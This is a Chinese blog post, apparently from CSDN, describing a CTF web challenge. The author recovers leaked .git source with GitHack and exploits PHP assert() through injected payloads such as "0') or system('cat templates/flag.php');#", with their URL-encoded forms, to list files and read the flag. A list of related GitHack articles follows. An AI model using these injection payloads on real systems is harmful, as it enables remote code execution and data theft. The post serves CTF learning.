ctf随笔(5) Githack简单运用

最新推荐文章于 2024-05-05 16:02:52 发布
最新推荐文章于 2024-05-05 16:02:52 发布
阅读量1k 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ma_nong_/article/details/102600240
版权

打开题目,首页一篇没啥用的开场,仔细查看会发现有这样一个网页
在这里插入图片描述这个网页就有很明显的提示:git,php
首先去看看网页的git,果不其然有我们需要的东西
在这里插入图片描述但是直接点击下载之后,出现的全是乱码,这个时候就需要githack一下了
格式:python GitHack.py http://xxx.xxx.xxx.xxx/.git
这样,一大堆代码我们就获得了
在这里插入图片描述
打开文件夹,看看代码,需要注意的就是一下部分了
在这里插入图片描述
在这里插入图片描述
这里面反复出现函数assert(),拿到百度上看一看
在这里插入图片描述关于安全性:如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。跟eval()类似, 不过eval($assertion)只是执行符合php编码规范的code_str。
这里我们通过输入特定的字符,使得函数assert()发挥其他作用,原理类似简单sql注入
第一次尝试,构造如下:0 ’ ) or phpinfo() ;#
如此,原语句就变成了这种形式:在这里插入图片描述’#'号的意思是把这一行之后的代码都注释掉了,assert函数执行下来就是做了phpinfo函数
但是照着我这样的构造写的话,很大概率会报错,要对我们的构造代码处理一下
在这里插入图片描述处理成url编码,再尝试一次就OK了
之后再构造相关的查询:0 ’ ) or system(‘ls’) ;#
转码后: 0%27)%20or%20system(%27ls%27);%23
再打开网页源代码
在这里插入图片描述

构造如下:0 ’ ) or system(‘ls+templates’) ;#
转码后:0%27)%20or%20system(%27ls%2btemplates%27);%23
打开网页源码:

在这里插入图片描述

构造如下:0’) or system(‘cat+templates/flag.php’);#
转码后:0%27)%20or%20system(%27cat%2btemplates%2fflag.php%27);%23
题主在这发现了一些问题,并不是所有转码都是可行的,’+‘和’/‘的转码会引起歧义
最后修改后:0’) or system(‘cat+templates/flag.php’);%23
得到flag
在这里插入图片描述

小崽砸
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
【网络安全 | 渗透工具】Githack工具安装及使用教程详析
等风来
05-29 2万+
本文仅分享Githack工具基本安装及使用相关知识不承担任何法律责任。Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管理系统,并将其部署到生产环境中以维护其代码库。然而,在配置不当的情况下,可能会导致.git文件夹被直接部署到线上环境中,这可能会导致Git泄露问题。可通过githack下载泄露的Git存储库,以获取包含未加密密码、凭据和敏感信息的站点代码库。使用githack下载Git存储库的方法有两种。本文仅分享。
githack-master.zip
08-26
GitHack是一款专为解决Git泄露问题而设计的工具,尤其在CTF(Capture The Flag)竞赛中被广泛使用。CTF是一种网络安全领域的竞技活动,参与者通过解密、漏洞挖掘、逆向工程等技术来获取“旗标”,即比赛的关键信息。...
GitHack-master
02-13
git源码泄露利用工具,`.git` 泄漏利用工具,可还原历史版本,不需要安装其它 Python 库,只需要有 git 命令
2024年关于gitHack工具入门(小结),网络安全开发框架
最新发布
m0_60452293的博客
05-05 1185
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Githack之小白篇
weixin_52116519的博客
09-26 4309
Githack之小白篇 遇到CTF题目中要用Githack,居然B站没有教程,小白太难了。现在将遇到的写下来,希望努力的有缘人能用到。 文章目录Githack之小白篇一、Python下载1.下载2.配置环境变量二、Githack1.介绍2.下载3.使用方法总结 一、Python下载 1.下载 电脑的应用商店就有下载,就没去官网了。据说一定要python2。 2.配置环境变量 一开始不行,以为用不了。结果一搜居然是没配置环境变量。。。 类似java的环境配置,我已经很熟练,就不写了。不会就得自己搜教程。 二
(Window)GitHack下载安装和使用【CTF工具/渗透测试/网络安全/信息安全】
m0_75203410的博客
06-06 3999
GitHack是一个.git泄露利用脚本,通过泄露的.git文件夹下的文件,重建还原工程源代码。渗透测试人员、攻击者,可以进一步审计代码,挖掘:文件上传,SQL注射等web安全漏洞。
CTFweb Git泄露 类题目 ———— 怎样用GitHack工具得到git泄露源码 详细教程-------从安装到使用
日熙的博客
07-30 6235
git泄露有关知识: 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞 GitHack 是一个.git泄露利用 测试脚本,通过泄露的文件,还原重建工程源代码。 Git信息泄露的危害很大,渗透测试人员、攻击者,可直接从源码获取敏感配置信息(如:邮箱,数据库),也可以进一步审计代码,挖掘文件上传、SQL注射等安全漏洞。 ————参考的文章链接:文章1,文章2 ...
githack泄露利用_softlysu3_ctfgithack_githack_CTF之.git泄露_githack下载_
10-03
GitHack 是一个针对 `.git` 目录泄露的利用工具,主要用于网络安全竞赛(CTF,Capture The Flag)中的Web安全领域。`.git` 目录是Git版本控制系统的一部分,通常包含项目的完整历史记录和敏感信息,如源代码、配置...
GitHack-master.zip
06-09
githack,ctf工具,git泄露问题,查看文件夹。解压压缩包后使用。
GitHack改进版(git源码泄露恢复工具)
09-26
GitHack改进版是一款专为CTF(Capture The Flag)竞赛设计的工具,主要用途是对不慎泄露的Git源码进行恢复,以防止敏感信息落入他人之手。Git是世界上最流行的分布式版本控制系统,广泛应用于软件开发中,但同时也...
泄露利用测试脚本:GitHack
12-17
GitHack 是一个专门为网络安全专业人士和CTF(Capture The Flag)竞赛参与者设计的工具脚本,其主要目的是检测和利用.git泄露情况。在许多在线服务和Web应用程序中,开发者可能无意间将.git目录暴露,这可能导致敏感...
GitHack_githack_
10-03
githack dddd 用于git !
Laykefu客服系统 任意文件上传漏洞,2024年最新34岁程序员年薪50w
2401_83739632的博客
04-15 360
Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台,恶意攻击者可利用此问题,上传后门文件,获取服务器权限。Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。
攻防_漏洞_.git泄露_GitHack使用方法
redglare的博客
11-24 1271
ctf小白刚下载这个,不知道怎么用。现在会用啦就记录一下~ 下载地址:https://github.com/lijiejie/GitHack   下载下来后,通过cmd使用,如下图所示: 总结(命令): GitHack.py http://XXXXXXXXXXX/.git/ 运行结束后,得到文件,如图: 接下来就可以自行愉快玩耍啦~~~~   当前大量开发人员使用git...
GitHack下载和简单使用
akxnxbshai的博客
03-04 6639
以linux中的CentOs 64位 为例: 步骤一:(如果安装过git命令的可以跳过) 输入: yum install -y git 直到提示: 才算成功。 步骤二: 输入: git clone https://github.com/lijiejie/GitHack 成功。 以下是简单使用。 步骤三:(必须进入GitHack所在的目录) 输入: python GitHack.py 网址/.git/ 要注意自己出现的是GitHack.py还是GitHacker.py
CTF中的GIT泄露
zy_mpy的博客
03-13 847
由于本人也是一名ctf的萌新,所以笔记比较易懂但又不可避免的浅显,如有错误,欢迎各路大神来指正。先简单介绍一下Git,Git是一个开源的分布式版本控制系统,在执行git init初始化目录的时候,会在当前目录下自动创建一个.git目录,用来记录代码的变更记录等。发布代码的时候,如果没有把,git这个目录删除,就直接发布到了服务器上,攻击者就可以通过它来恢复源代码,这就引起了git泄露漏洞。处理Git泄露的题目时,需要用到scrabble,dirsearch和gihack三个工具。一、常规git泄露常规 gi
githack脚本分析
王嘟嘟的博客
03-30 2349
0x00 前言 这里看到源码泄露的问题,所以看到这个脚本,解析中学习一下。 0x01 代码详细分析 1.首先是解决index文件以及一些基本参数的设置 这里将不懂的地方全部都写上了注释 2.参数设置总结 self.base_url 设置url self.domain 设置域名 self.queue 设置队列 self.lock 资源锁 self.thread_count 设置线程 self.ST...
GitHack在kali Linux环境下的下载与安装
热门推荐
qq_45728555的博客
05-28 1万+
在做ctfhub的git泄露题目时,需要用到GitHack软件来获取网站的git文件 我在CSDN上看了多篇GitHack安装文章,甚至自己都安装成功了,但是用“git log”查看日志时与别人不同,于是写下我的经历希望对你有所帮助 GitHack的下载链接 git clone https://github.com/BugScanTeam/GitHack ...
爬取网站目录工具githack
m0_52663093的博客
01-21 2027
一 git hack 下载地址: GIT:https://github.com/lijiejie/GitHack git hack介绍: a GitHack是一个.git泄露利用测试脚本,通过泄露的文件,还原重建工程源代码。 b 设置环境变量: 装上Python2,然后把Python2目录添加到环境变量 右键计算机-属性-高级系统设置 c 然后执行命令D:\Python27\python.exeD:\Users\cxt\Downloads\GitHack-master\GitHack...
ctfhub-git泄露stash
09-13
根据引用和引用提供的信息,你可以尝试使用GitHack和dirsearch工具来扫描和利用ctfhub-git的泄露。首先,进入GitHack文件夹,执行命令"python GitHack.py ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值